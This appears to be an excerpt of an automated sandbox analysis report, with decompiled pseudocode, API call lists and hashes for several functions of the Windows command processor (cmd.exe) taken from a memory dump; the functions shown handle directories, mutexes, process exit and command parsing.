                                    					_t75 = _v44;
                                    					if(_t75 == 0) {
                                    						_t75 =  &_v564;
                                    					}
                                    					 *_t75 = _v22;
                                    					_t76 = _v44;
                                    					if(_t76 == 0) {
                                    						_t76 =  &_v564;
                                    					}
                                    					 *((short*)(_t76 + 2)) = _v20;
                                    					_t58 = _v44;
                                    					if(_t58 == 0) {
                                    						_t58 =  &_v564;
                                    					}
                                    					_t77 = 0x5c;
                                    					 *((short*)(_t58 + 4)) = _t77;
                                    					_t59 = _v44;
                                    					if(_t59 == 0) {
                                    						_t59 =  &_v564;
                                    					}
                                    					 *((short*)(_t59 + 6)) = 0;
                                    					_t84 = _v44;
                                    					if(_v44 == 0) {
                                    						_t84 =  &_v564;
                                    					}
                                    					_t79 =  &_v24;
                                    					E011E3A50( &_v24, _t84);
                                    					_t61 = _v44;
                                    					if(_t61 == 0) {
                                    						_t61 =  &_v564;
                                    					}
                                    					_t62 = SetCurrentDirectoryW(_t61);
                                    					if(_t62 == 0) {
                                    						_push(_t62);
                                    						_push(GetLastError());
                                    						E011DC5A2(_t79);
                                    					}
                                    					if(_t91 != 0) {
                                    						SetErrorMode(_t86);
                                    					}
                                    					L20:
                                    					_t80 =  *0x1213cb8;
                                    					if( *0x1213cb8 == 0) {
                                    						_t80 = 0x1213ab0;
                                    					}
                                    					_t83 =  *0x1213cc0;
                                    					_t49 = E011E36CB(_t68, _t80,  *0x1213cc0, 0);
                                    					goto L23;
                                    				}
                                    				if(SetCurrentDirectoryW(_t91) != 0) {
                                    					goto L20;
                                    				}
                                    				_t86 = SetErrorMode(1);
                                    				goto L4;
                                    			}


                                    APIs
                                    • memset.MSVCRT ref: 011F9427
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F954E
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 011F9480
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 011F9490
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 011F950B
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 011F9516
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 011F9529
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                    • String ID:
                                    • API String ID: 920682188-0
                                    • Opcode ID: 13197c93769cc4e4ef6a66a30d89e5e3d5133ef86d3c73026ccc0e0c9dd6cc39
                                    • Instruction ID: 3cf2fd26c6c5f8520a21dc510bc602aab42f822614b94fcb95667366dc233f2d
                                    • Opcode Fuzzy Hash: 13197c93769cc4e4ef6a66a30d89e5e3d5133ef86d3c73026ccc0e0c9dd6cc39
                                    • Instruction Fuzzy Hash: 7D41B431A00219ABDF29DFA5E858BEEB7B4FF58718F00419DE905E7250EB34DA84CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E011F17B6(char* __ecx, signed int* __edx) {
                                    				intOrPtr _v0;
                                    				signed int _v8;
                                    				char _v528;
                                    				void* _v532;
                                    				signed int _v536;
                                    				void* _v540;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t20;
                                    				void* _t25;
                                    				void* _t29;
                                    				signed int* _t39;
                                    				char* _t40;
                                    				void* _t54;
                                    				signed int _t55;
                                    				signed int _t57;
                                    
                                    				_t40 = __ecx;
                                    				_t20 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t20 ^ _t57;
                                    				_t39 = __edx;
                                    				 *((intOrPtr*)(__edx)) = 0;
                                    				E011E274C( &_v528, 0x104, L"Local\\SM0:%d:%d:%hs", GetCurrentProcessId());
                                    				_t25 =  &_v528;
                                    				__imp__CreateMutexExW(0, _t25, 0, 0x1f0001, 0x40, __ecx);
                                    				_t54 = _t25;
                                    				_v532 = _t54;
                                    				if(_t54 != 0) {
                                    					E011F2D6D( &_v532,  &_v540);
                                    					_t49 =  &_v536;
                                    					_v536 = 0;
                                    					_t55 = 0;
                                    					_t53 = E011F1578( &_v528,  &_v536,  &_v532);
                                    					if(_t53 >= 0) {
                                    						_t55 = _v536 << 2;
                                    						_t53 = 0;
                                    					} else {
                                    						_push(_t53);
                                    						_push("wil");
                                    						_t49 = 0x6a;
                                    						E011F292C();
                                    					}
                                    					if(_t53 >= 0) {
                                    						if(_t55 == 0) {
                                    							L14:
                                    							_t49 =  &_v532;
                                    							_t40 =  &_v528;
                                    							_t29 = E011F250A(_t40,  &_v532, _t53, _t39);
                                    							_t53 = _t29;
                                    							if(_t29 >= 0) {
                                    								goto L9;
                                    							} else {
                                    								_t49 = 0x129;
                                    								goto L16;
                                    							}
                                    							goto L18;
                                    						} else {
                                    							 *_t39 = _t55;
                                    							_t40 =  *_t55 + 1;
                                    							 *( *_t39) = _t40;
                                    							L9:
                                    							_t53 = 0;
                                    						}
                                    					} else {
                                    						_t49 = 0x121;
                                    						L16:
                                    						_t40 = _v0;
                                    						E011F292C("wil", _t53);
                                    					}
                                    					if(_v540 != 0 && ReleaseMutex(_v540) == 0) {
                                    						_push(_t40);
                                    						L13:
                                    						E011F2D56();
                                    						goto L14;
                                    					}
                                    					_t54 = _v532;
                                    				} else {
                                    					_t53 = E011F1EBE(_t40);
                                    				}
                                    				L18:
                                    				if(_t54 != 0 && CloseHandle(_t54) == 0) {
                                    					_push(_t40);
                                    					goto L13;
                                    				}
                                    				return E011E6FD0(_t53, _t39, _v8 ^ _t57, _t49, _t53, _t54);
                                    			}


                                    APIs
                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 011F17D7
                                    • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 011F1805
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,wil,00000000,?,?,?,?), ref: 011F189F
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?), ref: 011F18EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Mutex$CloseCreateCurrentHandleProcessRelease
                                    • String ID: Local\SM0:%d:%d:%hs$wil
                                    • API String ID: 3048291649-2303653343
                                    • Opcode ID: daee96c80e1cb2038758ccfa4614338558d4de4a6adec5af45a85da5fe24b2b5
                                    • Instruction ID: 20532989193382df4dd7e8a453e33cca442cd0ce9d3e926a420876a1f1f93007
                                    • Opcode Fuzzy Hash: daee96c80e1cb2038758ccfa4614338558d4de4a6adec5af45a85da5fe24b2b5
                                    • Instruction Fuzzy Hash: 0B312871E40129EBCB2DDB54DD88FEA7775ABA0704F0141ADEA09A7244DB709D41CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E011E6E03(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				int _t10;
                                    				intOrPtr _t14;
                                    				intOrPtr _t20;
                                    				intOrPtr* _t21;
                                    				int _t34;
                                    				intOrPtr _t36;
                                    				int _t38;
                                    				void* _t40;
                                    				void* _t47;
                                    				void* _t48;
                                    
                                    				_push(0x10);
                                    				_push(0x11fbe78);
                                    				E011E75CC(__ebx, __edi, __esi);
                                    				 *((intOrPtr*)(_t40 - 4)) = 0;
                                    				_t36 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                    				_t34 = 0;
                                    				while(1) {
                                    					_t20 = _t36;
                                    					_t10 = 0;
                                    					asm("lock cmpxchg [edx], ecx");
                                    					if(0 == 0) {
                                    						break;
                                    					}
                                    					if(0 != _t36) {
                                    						Sleep(0x3e8);
                                    						continue;
                                    					} else {
                                    						_t38 = 1;
                                    						_t34 = 1;
                                    					}
                                    					L6:
                                    					_t47 =  *0x11fd514 - _t38; // 0x0
                                    					if(_t47 != 0) {
                                    						__eflags =  *0x11fd514; // 0x0
                                    						if(__eflags != 0) {
                                    							 *0x11fd19c = _t38;
                                    							goto L12;
                                    						} else {
                                    							 *0x11fd514 = _t38;
                                    							_t10 = E011E6F72(_t20, 0x11d1c04, 0x11d1c10);
                                    							__eflags = _t10;
                                    							if(__eflags == 0) {
                                    								goto L12;
                                    							} else {
                                    								 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
                                    								goto L24;
                                    							}
                                    						}
                                    					} else {
                                    						_push(0x1f);
                                    						L011E73C4();
                                    						L12:
                                    						_t48 =  *0x11fd514 - _t38; // 0x0
                                    						if(_t48 == 0) {
                                    							_push(0x11d1c00);
                                    							_push(0x11d1bd8);
                                    							L011E75C6();
                                    							 *0x11fd514 = 2;
                                    						}
                                    						if(_t34 == 0) {
                                    							_t10 =  *0x11fd510;
                                    							 *0x11fd510 = 0;
                                    						}
                                    						_t51 =  *0x11fd520;
                                    						if( *0x11fd520 != 0) {
                                    							_t10 = E011E7420(_t51, 0x11fd520);
                                    							if(_t10 != 0) {
                                    								_t38 =  *0x11fd520; // 0x0
                                    								 *0x12194b4(0, 2, 0);
                                    								_t10 =  *_t38();
                                    							}
                                    						}
                                    						_push( *0x11fd1a8);
                                    						_push( *0x11fd1a4);
                                    						_push( *0x11fd1a0);
                                    						E011E44FC();
                                    						 *0x11fd198 = _t10;
                                    						if( *0x11fd1b0 != 0) {
                                    							__eflags =  *0x11fd19c;
                                    							if( *0x11fd19c == 0) {
                                    								__imp___cexit();
                                    							}
                                    							 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
                                    							L24:
                                    							return E011E7614(0, _t34, _t38);
                                    						} else {
                                    							exit(_t10);
                                    							_t21 =  *((intOrPtr*)(_t40 - 0x14));
                                    							_t14 =  *((intOrPtr*)( *_t21));
                                    							 *((intOrPtr*)(_t40 - 0x20)) = _t14;
                                    							_push(_t21);
                                    							_push(_t14);
                                    							L011E731E();
                                    							return _t14;
                                    						}
                                    					}
                                    				}
                                    				_t38 = 1;
                                    				__eflags = 1;
                                    				goto L6;
                                    			}














                                    APIs
                                    • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,011FBE78,00000010), ref: 011E6E40
                                    • _amsg_exit.MSVCRT ref: 011E6E55
                                    • _initterm.MSVCRT ref: 011E6EA9
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 011E6ED5
                                    • exit.MSVCRT ref: 011E6F1C
                                    • _XcptFilter.MSVCRT ref: 011E6F2E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                    • String ID:
                                    • API String ID: 796493780-0
                                    • Opcode ID: 3b8df59d4ec9e09d288daf9dac45f59f3ad82cf03867811a1496ea1f1df5acd2
                                    • Instruction ID: c01f00fc130d3599109980b28f18ab596af904923a45020686dd5d407ba42614
                                    • Opcode Fuzzy Hash: 3b8df59d4ec9e09d288daf9dac45f59f3ad82cf03867811a1496ea1f1df5acd2
                                    • Instruction Fuzzy Hash: 85319071544A229FEF3EDBE8F80D7293BF0AB24729F50002DE512972D4DB305980CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E011E4C3E() {
                                    				long _v8;
                                    				int _t8;
                                    				void* _t15;
                                    				void* _t18;
                                    
                                    				_push(_t15);
                                    				_v8 = _v8 | 0xffffffff;
                                    				_t18 = _t15;
                                    				 *0x11fd0db = 0;
                                    				WaitForSingleObject(_t18, 0xffffffff);
                                    				_t8 = GetExitCodeProcess(_t18,  &_v8);
                                    				if(_v8 == 0xc000013a) {
                                    					EnterCriticalSection( *0x1203858);
                                    					 *0x11fd544 = 1;
                                    					LeaveCriticalSection( *0x1203858);
                                    					fflush(E011E7721(fprintf(E011E7721(_t8, 2), "^C"), 2));
                                    				}
                                    				 *0x11fd0db = 1;
                                    				CloseHandle(_t18);
                                    				return _v8;
                                    			}








                                    APIs
                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C55
                                    • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C60
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C7B
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011EEE57
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011EEE6D
                                    • fprintf.MSVCRT ref: 011EEE81
                                    • fflush.MSVCRT ref: 011EEE8F
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                    • String ID:
                                    • API String ID: 4271573189-0
                                    • Opcode ID: 82e9cf2b012165ab400f70d2473881d8b653da03450d0145a8cbae9fdc55543a
                                    • Instruction ID: 1e3d46453040eada4163dbbde99bddb775cd771af8901d3305254d412792885d
                                    • Opcode Fuzzy Hash: 82e9cf2b012165ab400f70d2473881d8b653da03450d0145a8cbae9fdc55543a
                                    • Instruction Fuzzy Hash: A401D431801654FFDF24EBE8B80CA993BADEB15319F100249F024921D9CFB006808B62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E011E07C0(void* __ebx, long __ecx, intOrPtr _a4) {
                                    				intOrPtr _v0;
                                    				void* _v4;
                                    				intOrPtr _v8;
                                    				signed int _v12;
                                    				char _v20;
                                    				signed int _v32;
                                    				short _v564;
                                    				char _v576;
                                    				char* _v580;
                                    				char _v1100;
                                    				void* _v1104;
                                    				long _v1108;
                                    				intOrPtr _v1112;
                                    				signed int _v1116;
                                    				intOrPtr* _v1120;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t70;
                                    				signed int _t71;
                                    				int _t75;
                                    				long _t78;
                                    				signed short* _t81;
                                    				signed short _t90;
                                    				intOrPtr* _t91;
                                    				short* _t96;
                                    				char* _t97;
                                    				intOrPtr _t100;
                                    				intOrPtr _t103;
                                    				wchar_t* _t104;
                                    				long _t107;
                                    				signed int _t108;
                                    				signed char _t120;
                                    				long _t121;
                                    				wchar_t* _t126;
                                    				int _t127;
                                    				void* _t129;
                                    				wchar_t* _t130;
                                    				signed short* _t141;
                                    				wchar_t* _t158;
                                    				wchar_t* _t163;
                                    				signed int _t167;
                                    				signed int _t171;
                                    				long _t175;
                                    				void* _t176;
                                    				signed int _t179;
                                    				void* _t180;
                                    				void* _t184;
                                    				void* _t186;
                                    				signed int _t187;
                                    				int _t188;
                                    				signed int _t189;
                                    				intOrPtr* _t190;
                                    				intOrPtr* _t191;
                                    				signed int _t193;
                                    				void* _t194;
                                    				void* _t196;
                                    				signed int _t197;
                                    				void* _t199;
                                    				void* _t200;
                                    
                                    				_push(0xfffffffe);
                                    				_push(0x11fbd98);
                                    				_push(E011E7290);
                                    				_push( *[fs:0x0]);
                                    				_t200 = _t199 - 0x450;
                                    				_t70 =  *0x11fd0b4; // 0x2833377e
                                    				_v12 = _v12 ^ _t70;
                                    				_t71 = _t70 ^ _t197;
                                    				_v32 = _t71;
                                    				_push(__ebx);
                                    				_push(_t71);
                                    				 *[fs:0x0] =  &_v20;
                                    				_t175 = __ecx;
                                    				_v1108 = __ecx;
                                    				_v1112 = 0;
                                    				GetConsoleTitleW( &_v564, 0x104);
                                    				if( *(_t175 + 0x38) == 0) {
                                    					L88:
                                    					_t75 = 1;
                                    					goto L44;
                                    				} else {
                                    					E011E0D51( &_v1100);
                                    					if(_v576 == 0) {
                                    						_t78 = 0x104;
                                    					} else {
                                    						_t78 = 0x7fe7;
                                    					}
                                    					if(E011E0C70( &_v1100, _t78) < 0) {
                                    						L87:
                                    						E011E0DE8(_t79,  &_v1100);
                                    						goto L88;
                                    					} else {
                                    						_t81 =  *(_t175 + 0x38);
                                    						if(_t81[1] == 0x3a) {
                                    							_t140 =  *_t81;
                                    							if(E011E29BB( *_t81) == 0) {
                                    								_push(0);
                                    								_push(0xf);
                                    								goto L83;
                                    							} else {
                                    								_t140 =  *( *(_t175 + 0x38));
                                    								if(E011E6A96( *( *(_t175 + 0x38))) != 0) {
                                    									_push(0);
                                    									_push(GetLastError());
                                    									L83:
                                    									_t79 = E011DC5A2(_t140);
                                    									goto L86;
                                    								} else {
                                    									_t187 = towupper( *( *(_t175 + 0x38)) & 0x0000ffff) - 0x00000040 & 0x0000ffff;
                                    									_t141 =  *(_t175 + 0x38);
                                    									_t55 =  &(_t141[1]); // 0x2
                                    									_t169 = _t55;
                                    									do {
                                    										_t90 =  *_t141;
                                    										_t141 =  &(_t141[1]);
                                    									} while (_t90 != 0);
                                    									if(_t141 - _t169 >> 1 == 2) {
                                    										_t91 = E011F93E2(_t187, _t169);
                                    										goto L90;
                                    									} else {
                                    										goto L65;
                                    									}
                                    								}
                                    							}
                                    							goto L44;
                                    						} else {
                                    							_t169 =  &_v1104;
                                    							_t189 = E011DE040(_t175,  &_v1104);
                                    							_v1116 = _t189;
                                    							if(_t189 == 0xffffffff) {
                                    								L65:
                                    								_t188 = E011DC7AA(_t175);
                                    								goto L43;
                                    							} else {
                                    								if(_t189 == 0xfffffffe) {
                                    									goto L87;
                                    								} else {
                                    									_t91 =  *((intOrPtr*)(0x11d1624 + (_t189 + _t189 * 2) * 8));
                                    									_v1120 = _t91;
                                    									if(_t91 == 0) {
                                    										L90:
                                    										E011E0DE8(_t91,  &_v1100);
                                    										_t75 = 0;
                                    										goto L44;
                                    									} else {
                                    										_t96 = _v580;
                                    										if(_t96 == 0) {
                                    											_t96 =  &_v1100;
                                    										}
                                    										 *_t96 = 0x2f;
                                    										_t97 = _v580;
                                    										if(_t97 == 0) {
                                    											_t97 =  &_v1100;
                                    										}
                                    										 *((short*)(_t97 + 2)) = 0;
                                    										if(_v580 == 0) {
                                    											_t169 =  &_v1100;
                                    										}
                                    										_t130 = E011DEA40( *((intOrPtr*)(_t175 + 0x3c)), _t169, 2);
                                    										if(_t189 == 0xa) {
                                    											if(_t130 == 0) {
                                    												goto L12;
                                    											} else {
                                    												_t127 = wcsncmp(_t130, "/", 4);
                                    												_t200 = _t200 + 0xc;
                                    												if(_t127 != 0) {
                                    													goto L14;
                                    												} else {
                                    													goto L12;
                                    												}
                                    											}
                                    										} else {
                                    											L12:
                                    											if(_t189 == 0x1f) {
                                    												L14:
                                    												if(_t130 == 0) {
                                    													L34:
                                    													if(E011DE340(_t175) != 0) {
                                    														E011E100C(_t99, _t99);
                                    													}
                                    													_v8 = 0;
                                    													_t190 = _v1120;
                                    													_push(_t175);
                                    													if(_t190 == E011D5F50) {
                                    														_t100 = E011D5F50();
                                    													} else {
                                    														if(_t190 == E011D6980) {
                                    															_t100 = E011D6980();
                                    														} else {
                                    															if(_t190 == E011E2360) {
                                    																_t100 = E011E2360();
                                    															} else {
                                    																if(_t190 != E011D9410) {
                                    																	if(_t190 == E011E51B0) {
                                    																		_t100 = E011E51B0();
                                    																	} else {
                                    																		 *0x12194b4();
                                    																		_t100 =  *_t190();
                                    																	}
                                    																} else {
                                    																	_t100 = E011D9410();
                                    																}
                                    															}
                                    														}
                                    													}
                                    													_t188 = _t100;
                                    													_v1112 = _t188;
                                    													_v8 = 0xfffffffe;
                                    													_t93 = E011E0BDF(_t100);
                                    													L43:
                                    													E011E0DE8(_t93,  &_v1100);
                                    													_t75 = _t188;
                                    													L44:
                                    													 *[fs:0x0] = _v20;
                                    													_pop(_t176);
                                    													_pop(_t186);
                                    													_pop(_t129);
                                    													return E011E6FD0(_t75, _t129, _v32 ^ _t197, _t169, _t176, _t186);
                                    												} else {
                                    													while( *_t130 != 0) {
                                    														do {
                                    															_t103 =  *_t191;
                                    															_t191 = _t191 + 2;
                                    														} while (_t103 != 0);
                                    														_t193 = _t191 - _t155 >> 1;
                                    														_t104 = wcschr(_t130, 0x22);
                                    														_t200 = _t200 + 8;
                                    														if(_t104 != 0) {
                                    															memset(0x1213f10, 0, 0x1000 << 2);
                                    															_t200 = _t200 + 0xc;
                                    															_t158 = _t130;
                                    															_t46 =  &(_t158[0]); // 0x2
                                    															_t171 = _t46;
                                    															do {
                                    																_t107 =  *_t158;
                                    																_t158 =  &(_t158[0]);
                                    															} while (_t107 != 0);
                                    															_t155 = _t158 - _t171 >> 1;
                                    															_t179 = 0;
                                    															_t108 = 0;
                                    															if(_t155 > 0) {
                                    																do {
                                    																	_t171 =  *(_t130 + _t108 * 2) & 0x0000ffff;
                                    																	if(_t171 != 0x22) {
                                    																		 *(0x1213f10 + _t179 * 2) = _t171;
                                    																		_t179 = _t179 + 1;
                                    																	}
                                    																	_t108 = _t108 + 1;
                                    																} while (_t108 < _t155);
                                    															}
                                    															_t180 = _t179 + _t179;
                                    															if(_t180 >= 0x4000) {
                                    																E011E711D(_t108, _t130, _t155, _t171, _t180, _t193);
                                    																_push(_t197);
                                    																_push(_t193);
                                    																_push(_t180);
                                    																_t194 = E011E0C70(0x1213ab0, ((0 |  *0x1213cbc != 0x00000000) - 0x00000001 & 0xffff811d) + 0x7fe7);
                                    																if(_t194 < 0) {
                                    																	_push(_t194);
                                    																	_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
                                    																	_push(0x36);
                                    																	goto L101;
                                    																} else {
                                    																	_t162 =  *0x1213cb8;
                                    																	if( *0x1213cb8 == 0) {
                                    																		_t162 = 0x1213ab0;
                                    																	}
                                    																	_t194 = E011E6826(_t162,  *0x1213cc0, _v0, _a4);
                                    																	if(_t194 < 0) {
                                    																		_push(_t194);
                                    																		_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
                                    																		_push(0x37);
                                    																		L101:
                                    																		E011F292C();
                                    																	}
                                    																}
                                    																return _t194;
                                    															} else {
                                    																 *((short*)(_t180 + 0x1213f10)) = 0;
                                    																_t169 = 0x1213f10;
                                    																goto L20;
                                    															}
                                    														} else {
                                    															_t169 = _t130;
                                    															L20:
                                    															_t196 = _t193 + 1;
                                    															if(_t196 == 0 || _t196 > 0x7fffffff) {
                                    																if(_t196 != 0) {
                                    																	 *_t130 = 0;
                                    																}
                                    															} else {
                                    																_t126 = _t130;
                                    																_t184 = 0x7ffffffe - _t196;
                                    																_t169 = _t169 - _t130;
                                    																while(_t184 + _t196 != 0) {
                                    																	_t167 =  *(_t169 + _t126) & 0x0000ffff;
                                    																	if(_t167 != 0) {
                                    																		 *_t126 = _t167;
                                    																		_t126 =  &(_t126[0]);
                                    																		_t196 = _t196 - 1;
                                    																		if(_t196 != 0) {
                                    																			continue;
                                    																		}
                                    																	}
                                    																	break;
                                    																}
                                    																if(_t196 == 0) {
                                    																	_t126 = _t126 - 2;
                                    																}
                                    																_t155 = 0;
                                    																 *_t126 = 0;
                                    															}
                                    															_t120 = _v1104;
                                    															if((_t120 & 0x00000001) != 0) {
                                    																if(_t130[0] != 0x3a) {
                                    																	goto L29;
                                    																} else {
                                    																	_t155 =  *_t130;
                                    																	if(E011E29BB( *_t130) == 0) {
                                    																		_push(0);
                                    																		_push(0xf);
                                    																		goto L85;
                                    																	} else {
                                    																		if(_v1116 == 4) {
                                    																			L71:
                                    																			_t120 = _v1104;
                                    																			goto L29;
                                    																		} else {
                                    																			_t155 =  *_t130;
                                    																			if(E011E6A96( *_t130) != 0) {
                                    																				_push(0);
                                    																				_push(GetLastError());
                                    																				goto L85;
                                    																			} else {
                                    																				goto L71;
                                    																			}
                                    																		}
                                    																	}
                                    																}
                                    															} else {
                                    																L29:
                                    																if((_t120 & 0x00000002) != 0) {
                                    																	if( *_t130 != 0x2f) {
                                    																		goto L30;
                                    																	} else {
                                    																		_push(0);
                                    																		_push(0x232a);
                                    																		L85:
                                    																		_t79 = E011DC5A2(_t155);
                                    																		 *0x120b8b0 = 1;
                                    																		L86:
                                    																		goto L87;
                                    																	}
                                    																} else {
                                    																	L30:
                                    																	_t163 = _t130;
                                    																	_t34 =  &(_t163[0]); // 0x2
                                    																	_t169 = _t34;
                                    																	do {
                                    																		_t121 =  *_t163;
                                    																		_t163 =  &(_t163[0]);
                                    																	} while (_t121 != 0);
                                    																	_t130 = _t130 + (_t163 - _t169 >> 1) * 2 + 2;
                                    																	if(_t130 != 0) {
                                    																		continue;
                                    																	} else {
                                    																		break;
                                    																	}
                                    																}
                                    															}
                                    														}
                                    														goto L102;
                                    													}
                                    													_t175 = _v1108;
                                    													goto L34;
                                    												}
                                    											} else {
                                    												_t169 = _t130;
                                    												if(E011DDD2C(_t189, _t130, 1) != 0) {
                                    													goto L87;
                                    												} else {
                                    													goto L14;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				L102:
                                    			}
































































                                    APIs
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,2833377E,00000001,?), ref: 011E0816
                                      • Part of subcall function 011E0D51: memset.MSVCRT ref: 011E0D7D
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • towupper.MSVCRT ref: 011E0B44
                                      • Part of subcall function 011DE040: memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE0F3
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE10B
                                      • Part of subcall function 011DE040: _wcsicmp.MSVCRT ref: 011DE179
                                    • wcschr.MSVCRT ref: 011E0932
                                    • wcsncmp.MSVCRT(00000000,011D218C,00000004,00000002,00007FE7), ref: 011E0A76
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A06
                                      • Part of subcall function 011D6980: GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6A10
                                      • Part of subcall function 011D6980: _wcsnicmp.MSVCRT ref: 011D6A3D
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A64
                                      • Part of subcall function 011D6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6A6E
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A8E
                                      • Part of subcall function 011D6980: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6AA0
                                      • Part of subcall function 011D6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 011D6AC0
                                      • Part of subcall function 011D6980: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011D6AD1
                                      • Part of subcall function 011D6980: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011FD620,00000200,00000000,00000000), ref: 011D6AE7
                                      • Part of subcall function 011D6980: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011D6AF4
